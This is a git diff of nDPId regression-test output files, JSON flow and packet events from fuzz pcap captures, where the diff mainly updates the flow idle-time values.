{"user":"","password":"","auth_failed":0}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":691,"packets-processed":554,"total-skipped-flows":0,"total-l4-data-len":58605,"total-not-detected-flows":27,"total-guessed-flows":28,"total-detected-flows":194,"total-detection-updates":88,"total-updates":33,"current-active-flows":0,"total-active-flows":249,"total-idle-flows":249,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1435,"global_ts_msec":1120471107427} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 691/554 diff --git a/test/results/fuzz-2006-09-29-28586.pcap.out b/test/results/fuzz-2006-09-29-28586.pcap.out index bf52ccd4d..ff91c0aa0 100644 --- a/test/results/fuzz-2006-09-29-28586.pcap.out +++ b/test/results/fuzz-2006-09-29-28586.pcap.out @@ -2,207 +2,207 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1031854484481} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1031854484481} 00351{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"CAAgsl17AFCLk5N8CQBFAAAo8EpAAIAGrEqsFAMFrBQDDQooAFDkFf3+yWv\/bVARIal6iQAABIGD1GDD"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2246,"global_ts_msec":1031854488666} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2246,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5J8CMZFAAAs9EpAAIAGqEasFAMFrBQDDQopAFDkS6qJAAAAACUCMACAnQAAuAQFtGBh"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} 